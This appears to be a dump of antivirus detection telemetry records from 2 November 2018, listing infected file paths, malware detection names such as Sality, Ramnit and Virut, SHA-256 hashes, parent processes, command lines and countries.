  Row(detection=Row(filename='yacht.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\YACHT\\YACHT.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1320b4bef6bca83e6e5347ff8718e51c7d01b00eb5b2eccf9c2755c0fff930cd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='models.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL10\\MODELS\\MODELS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1377155317986c05ee7c9e4ae32f1c0e3333f9819269013f728eeebfe6141af6', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fph_prec.dll', filepath='C:\\CYPE Ingenieros\\Versión 2012\\programas\\fph_prec.dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='1378f427e8f97a775d5a15d5322d61b7c9590a21f05da06ca7581ed840c42425', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T13:16:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mediaespresso.exe', filepath='C:\\Program Files (x86)\\CyberLink\\PowerDVD15\\MediaEspresso\\MediaEspresso.exe', filesize=360000, name='W32/Sality.AT.#M1.#R1'), hash='14b11b2c26bc0106392ad0794283fce71961a7cad7868e3d383406c7151191e9', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:bJ7x0A2aSEilmu92.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T02:21:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unblockpin.exe', filepath='C:\\Program Files\\D-com 3G\\UnblockPin.exe', filesize=41472000, name='W32/Sality.AT.#M1.#R1'), hash='14e3bc696c7c4e79bc4cd2bf41f9ab2e0e4c3cd9747c603b5ec045ecd9a6bfba', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Office\\Office12\\GrooveMonitor.exe', parentsize=100648, timestamp='2018-11-02T15:42:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gardeningenthusiast-ttab02-2ac3e9e9cf35202ad2827766ceade26b.exe', filepath='C:\\Users\\X\\Desktop\\source\\MS\\InProd20181026-Tooltab\\GardeningEnthusiast-TTAB02-2AC3E9E9CF35202AD2827766CEADE26B.exe', filesize=380000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='152da9afd217d12b308a9ea213795cd2c3ea4636b4796140ee8177e744966031', metadata=Row(cmdline='x c:\\\\\\\\users\\\\\\\\X\\\\\\\\desktop\\\\\\\\source.7z -oc:\\\\\\\\users\\\\\\\\test_user\\\\\\\\desktop\\\\\\\\source\\\\\\\\ -pinfected', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\Avira_Scripts\\7za.exe', parentsize=587776, timestamp='2018-11-02T04:28:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ioc6839fbbb-1232-5d47-aa25-3f5f14678c30.exe', filepath='C:\\programdata\\kaspersky lab\\avp18.0.0\\temp\\ioc6839FBBB-1232-5D47-AA25-3F5F14678C30.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T20:27:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='iocd76b9a6c-6d6c-6246-b9f6-587a8b49532b.exe', filepath='C:\\programdata\\kaspersky lab\\avp18.0.0\\temp\\iocD76B9A6C-6D6C-6246-B9F6-587A8B49532B.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T20:27:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='iocedc48cef-66b1-e048-a5dc-7d7a2d599a05.exe', filepath='C:\\ProgramData\\Kaspersky Lab\\AVP18.0.0\\Temp\\iocEDC48CEF-66B1-E048-A5DC-7D7A2D599A05.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline='-r', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-02T18:47:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ioc44c2ba1e-85ab-eb42-a72d-3d3c1169ab63.exe', filepath='C:\\programdata\\kaspersky lab\\avp18.0.0\\temp\\ioc44C2BA1E-85AB-EB42-A72D-3D3C1169AB63.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M1.#R1'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline='-r', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-02T21:00:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ioca58999c6-d843-5747-8fcf-d8d2ccdd92cb.exe', filepath='C:\\programdata\\kaspersky lab\\avp18.0.0\\temp\\iocA58999C6-D843-5747-8FCF-D8D2CCDD92CB.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T21:00:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ioc4e133aa1-ece4-4648-ab9c-e05a595c164f.exe', filepath='C:\\ProgramData\\Kaspersky Lab\\AVP18.0.0\\Temp\\ioc4E133AA1-ECE4-4648-AB9C-E05A595C164F.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline='-r', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-02T19:30:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='iocd67c7687-6dd5-1741-9c62-228d9d2b00c6.exe', filepath='C:\\ProgramData\\Kaspersky Lab\\AVP18.0.0\\Temp\\iocD67C7687-6DD5-1741-9C62-228D9D2B00C6.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline='-r', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-02T18:59:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ioc512d889d-a5dd-b34f-90cf-c59e9527f232.exe', filepath='C:\\programdata\\kaspersky lab\\avp18.0.0\\temp\\ioc512D889D-A5DD-B34F-90CF-C59E9527F232.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T19:45:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ioc3d9de330-bd42-4044-bab5-070c5d18d955.exe', filepath='C:\\ProgramData\\Kaspersky Lab\\AVP18.0.0\\Temp\\ioc3D9DE330-BD42-4044-BAB5-070C5D18D955.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline='-r', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-02T19:00:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ioc53c6f46e-c044-dd4b-addc-87a9223d146a.exe', filepath='C:\\programdata\\kaspersky lab\\avp18.0.0\\temp\\ioc53C6F46E-C044-DD4B-ADDC-87A9223D146A.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T20:26:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='15a1db84497009e12fdb7552f2760ba209e56d386593b9217f9f6310466a8a84', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T13:16:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='aefuwin32.exe', filepath='C:\\Program Files (x86)\\MSI\\Live Update\\FlashUty\\AMI\\EFIWIN\\AEFUWIN32.exe', filesize=336000, name='W32/Sality.AT.#M1.#R1'), hash='15b9925ac1a18c98f6cac85ac30679bfe0434216e30fcbdc652f230a0118a19a', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T11:23:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-015519-c0e5a86a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-015519-C0E5A86A', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='15cdc877b347566b3e988688c259784ee564a86ffbc11098419b7a41e5c66654', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:57:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='15cdc877b347566b3e988688c259784ee564a86ffbc11098419b7a41e5c66654', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\15CDC877B347566B3E988688C259784EE564A86FFBC11098419B7A41E5C66654', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='15cdc877b347566b3e988688c259784ee564a86ffbc11098419b7a41e5c66654', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:41:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='15cdc877b347566b3e988688c259784ee564a86ffbc11098419b7a41e5c66654', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\15CDC877B347566B3E988688C259784EE564A86FFBC11098419B7A41E5C66654', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='15cdc877b347566b3e988688c259784ee564a86ffbc11098419b7a41e5c66654', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:02:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cubede~2.dll', filepath='J:\\Data Prog VB\\Master\\crystal 9\\Crystal Report 9.0\\ProgramF\\CRYSTAL\\CRW9\\CUBEDE~2.DLL', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='15e99a305a22f604409821a423274c7c2e24e2dc151b7a7284fba425418089e4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Mozilla Firefox\\firefox.exe', parentsize=450512, timestamp='2018-11-02T04:58:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='15eb3c37d6bda8e312878d03029d29c179720763c0370ba35b782a29961cab24', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T13:19:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='15eb3c37d6bda8e312878d03029d29c179720763c0370ba35b782a29961cab24', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T13:20:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='15eb3c37d6bda8e312878d03029d29c179720763c0370ba35b782a29961cab24', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T13:22:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='15eb3c37d6bda8e312878d03029d29c179720763c0370ba35b782a29961cab24', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T13:25:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dwr_workspace_ws_042.html', filepath='C:\\Program Files\\Common Files\\Adobe\\Help\\en_US\\Dreamweaver\\9.0_API\\dwr_workspace_ws_042.html', filesize=116000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='15f915639c51036e955a3c1151c5a07979d4164f31a01b04f9405e5bb7e54b84', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1378648, timestamp='2018-11-02T07:05:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dwr_workspace_ws_042.html', filepath='C:\\Program Files\\Common Files\\Adobe\\Help\\en_US\\Dreamweaver\\9.0_API\\dwr_workspace_ws_042.html', filesize=116000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='15f915639c51036e955a3c1151c5a07979d4164f31a01b04f9405e5bb7e54b84', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-02T08:39:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='decelod.exe', filepath='C:\\Users\\X\\AppData\\Local\\{B8788E24-9CD0-E29C-F148-C774D5203BEC}\\decelod.exe', filesize=1600000, name='HEUR/AGEN.1033829.#M1.#R1'), hash='1623129501d3a77f371635e57f9f599b6a3d3d202427c7d5a95ca710d9f22f8b', metadata=Row(cmdline='--engine=2 --session-id=\\\\\\/UisE3Y5XkckYeZOUHLc5PKGoB9QRhXHjdgA0f2i --registry-suffix=ESET --extended-safebrowsing-enabled --chrome-version=70.0.3538.77 --chrome-channel=4 --srt-field-trial-group-name=NewCleanerUIExperiment', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.177.200\\software_reporter_tool.exe', parentsize=12084856, timestamp='2018-11-02T03:25:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='decelod_734951e6.exe', filepath='C:\\Users\\X\\AppData\\Local\\{B8788E24-9CD0-E29C-F148-C774D5203BEC}\\decelod_734951e6.exe', filesize=1600000, name='HEUR/AGEN.1033829.#M1.#R1'), hash='1623129501d3a77f371635e57f9f599b6a3d3d202427c7d5a95ca710d9f22f8b', metadata=Row(cmdline='--engine=2 --session-id=\\\\\\/UisE3Y5XkckYeZOUHLc5PKGoB9QRhXHjdgA0f2i --registry-suffix=ESET --extended-safebrowsing-enabled --chrome-version=70.0.3538.77 --chrome-channel=4 --srt-field-trial-group-name=NewCleanerUIExperiment', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.177.200\\software_reporter_tool.exe', parentsize=12084856, timestamp='2018-11-02T03:25:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102804-52b033c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d543351\\AVSCAN-20181102-102641-490633FA\\AVSCAN-20181102-102804-52B033C6', filesize=1600000, name='Adware/DealPly.bqeij.#M1.#R1'), hash='1623129501d3a77f371635e57f9f599b6a3d3d202427c7d5a95ca710d9f22f8b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:28:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102757-51d82787', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d543351\\AVSCAN-20181102-102641-490633FA\\AVSCAN-20181102-102757-51D82787', filesize=1600000, name='Adware/DealPly.bqeij.#M1.#R1'), hash='1623129501d3a77f371635e57f9f599b6a3d3d202427c7d5a95ca710d9f22f8b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:28:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-130747-b9700410', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_57284e1a\\AVSCAN-20181102-130334-A080FDCF\\AVSCAN-20181102-130747-B9700410', filesize=1600000, name='Adware/DealPly.bqeij.#M1.#R1'), hash='1623129501d3a77f371635e57f9f599b6a3d3d202427c7d5a95ca710d9f22f8b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:07:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-203814-4c241886', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bcadd1e2\\AVSCAN-20181102-203323-2398996E\\AVSCAN-20181102-203814-4C241886', filesize=1600000, name='Adware/DealPly.bqeij.#M1.#R1'), hash='1623129501d3a77f371635e57f9f599b6a3d3d202427c7d5a95ca710d9f22f8b', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T23:38:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gag.dll', filepath='ProgramFilesDir/[PluginsDir]/gag.dll', filesize=128000, name='PUA/Outbrowse.Gen.#M2.#R5697'), hash='1637407ac610ce29ed4f4f1c6da3cb8f683c502374d0638389fe3c8e2bdc7c91', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T11:50:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='odin3 v3.10.6.exe', filepath='\\\\192.168.0.5\\desha_itd\\2.) OTHER THINGS\\LAHAT NG INSTALLER\\J7 FLASH FIRM WARE\\Odin3_v3.10.6\\Odin3 v3.10.6.exe', filesize=2368000, name='W32/Viking.AT.#M1.#R1'), hash='169e5d1c7f4fea8069f854d04d1ef83b60ab96d9fdd7334ea961c2d0b548f687', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2373784, timestamp='2018-11-02T13:59:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0008165.exe', filepath='I:\\System Volume Information\\_restore{41A21028-79D8-41F6-B5EB-76D4AC815628}\\RP4\\A0008165.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='16e1e44fdba79cc4a496d29d15fc7014f451ee62f91264a216015ea4e03d0680', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-02T16:18:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='alienshooter.exe', filepath='E:\\العاب\\Alien Shooter\\AlienShooter.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='1758d8dab8946ca04a861877e9821b4e89b41bc340e549bc412193b502057933', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T18:30:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-115009-8a2fa5c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_440c12e1\\AVSCAN-20181102-114942-8635222C\\AVSCAN-20181102-115009-8A2FA5C7', filesize=3008000, name='HEUR/APC.#M1.#R1'), hash='176078c89d8322f3708cae7368757e98195ed0510fdba989ed36df5edeb91669', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:49:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='s_vag.exe', filepath='c:\\napro\\pc-scan3000 fl\\sistema_injecao\\s_vag.exe', filesize=3008000, name='HEUR/APC.#M1.#R1'), hash='176078c89d8322f3708cae7368757e98195ed0510fdba989ed36df5edeb91669', metadata=Row(cmdline='000', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\NAPRO\\PC-SCAN3000 FL\\Menu_3000FL.exe', parentsize=5877760, timestamp='2018-11-02T14:48:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qwindows.dll', filepath='e:\\program files (x86)\\hi-rez studios\\platforms\\qwindows.dll', filesize=896000, name='W32/Ramnit.C.#M1.#R1'), hash='17b799743c0fc770cb12f7b7599c09595bc98746392d0567947eeb30112794f6', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:08:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='optsatadc.dll', filepath='C:\\Windows\\SysWOW64\\optsatadc.dll', filesize=384000, name='TR/Crypt.XPACK.Gen.#M300.#R4115'), hash='17ccbea28d13c18a8cc8894ada580b57ba1e843aec3ffd213be2579433d7eb2d', metadata=Row(cmdline='-k BitStreamingDrv', country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\svchost.exe', parentsize=20992, timestamp='2018-11-02T06:37:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-115433-a51e2d46', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_67195281\\AVSCAN-20181102-115346-9EE9A257\\AVSCAN-20181102-115433-A51E2D46', filesize=384000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='17ccbea28d13c18a8cc8894ada580b57ba1e843aec3ffd213be2579433d7eb2d', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:54:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='old character maker.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\MUGEN Character Maker\\Old Character Maker\\Old Character Maker.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17fda011ee2b31abf1cb952720428e6f97c148c7b9caf0e5791049a2cbad76db', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='plugins.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\plugins\\plugins.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17fda011ee2b31abf1cb952720428e6f97c148c7b9caf0e5791049a2cbad76db', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:21Z'), dt=datetime.date(2018, 11, 2)),
